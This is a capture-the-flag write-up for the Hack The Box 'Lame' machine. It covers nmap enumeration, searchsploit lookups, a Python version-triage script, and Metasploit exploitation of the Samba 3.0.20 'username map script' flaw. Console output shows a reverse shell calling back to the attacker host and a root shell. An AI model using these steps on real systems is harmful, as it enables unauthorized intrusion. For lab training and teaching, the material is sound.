
Hack The Box - Lame Writeup


IP          OS     Difficulty  Release Date
10.10.10.3  Linux  Easy        14 March 2017

Enumeration

Our first task is an nmap scan of the host to see which ports are open and which services and versions are running on them.

nmap

kali@kali:~/Desktop$ nmap -sC -sV -T4 -v -Pn 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 13:18 

Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.23
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 57.25 seconds

From the scan we can see that the host is Linux and runs FTP (vsftpd 2.3.4, with anonymous login allowed), SSH (OpenSSH 4.7p1) and SMB (Samba 3.0.20).

Checking for vulnerabilities

Using the version information from nmap, we can check with searchsploit whether any of the running services have publicly known exploits.

Searchsploit

kali@kali:~/Desktop$ searchsploit vsftpd 2.3.4
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)          | unix/remote/17491.rb
---------------------------------------------------------------- ---------------------------------

kali@kali:~/Desktop$ searchsploit samba 3.0.20
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execu | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                           | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                           | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                   | linux_x86/dos/36741.py
---------------------------------------------------------------- ---------------------------------

Searchsploit shows that both vsftpd 2.3.4 and Samba 3.0.20 are vulnerable and have exploits available: a backdoor in vsftpd and the 'username map script' command execution in Samba.
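This kind of version triage can be automated. The following is an added example, not part of the original writeup: it parses the nmap service lines above and flags any service whose fingerprinted version falls inside the ranges named in the searchsploit titles. The sample lines, ranges and Exploit-DB ids are taken from this page; the function names are my own.

```python
import re

# Constructed sample input: the service lines from the nmap -sV scan above.
NMAP_OUTPUT = """\
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Affected ranges transcribed from the searchsploit titles above:
# (product, lowest affected, upper bound (exclusive), Exploit-DB reference)
VULNERABLE = [
    ("vsftpd", "2.3.4", "2.3.5", "Backdoor Command Execution (EDB 17491)"),
    ("samba", "3.0.20", "3.0.25rc3", "'Username map script' Command Execution (EDB 16320)"),
]

LINE_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+\s+(.*)$")
# Require at least one dot so fingerprints like "3.X - 4.X" are not mistaken for versions.
VERSION_RE = re.compile(r"\b(\d+\.\d+(?:\.\d+)*(?:rc\d+|p\d+)?)\b")

def version_key(version):
    """Sortable key: numeric parts, then pre-release (rc) < release < patch level (p)."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:(rc|p)(\d+))?", version)
    nums = tuple(int(x) for x in m.group(1).split("."))
    stage = {"rc": 0, None: 1, "p": 2}[m.group(2)]
    return (nums, stage, int(m.group(3) or 0))

def parse_services(nmap_text):
    """Yield (port, product, version-or-None) from 'PORT STATE SERVICE VERSION' lines."""
    for line in nmap_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        port, banner = m.groups()
        vm = VERSION_RE.search(banner)
        yield int(port), banner.split()[0].lower(), (vm.group(1) if vm else None)

def triage(nmap_text):
    """Return (port, product, version, note) for each service inside a known-affected range."""
    findings = []
    for port, product, version in parse_services(nmap_text):
        if version is None:
            findings.append((port, product, None, "version not fingerprinted; check manually"))
            continue
        for prod, low, upper, note in VULNERABLE:
            if product == prod and version_key(low) <= version_key(version) < version_key(upper):
                findings.append((port, product, version, note))
    return findings
```

On the scan above this flags ports 21 and 445, reports port 139 as unfingerprinted, and leaves OpenSSH alone; the same loop works on any nmap -sV output once the affected ranges are filled in.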

Exploitation

To exploit this box we will use Metasploit, as both vulnerabilities on this host have modules available.

Exploiting Samba

To exploit this version of Samba we will use the Metasploit module exploit/multi/samba/usermap_script.

msfconsole
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.23:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo OhcjF5EzUh05OsNp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "OhcjF5EzUh05OsNp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.3:46694) at 2020-06-13 14:04:47 -0400


whoami
root

  1. Open Metasploit with msfconsole
  2. Select the module with use exploit/multi/samba/usermap_script
  3. See which options need to be set with show options
  4. Set the remote host option with set RHOSTS 10.10.10.3
  5. Run the exploit with run or exploit

Shortly afterwards a shell session opens, already running as the root user. The user flag can be found in the /home directory and the root flag is in /root.

This post is licensed under CC BY 4.0 by the author.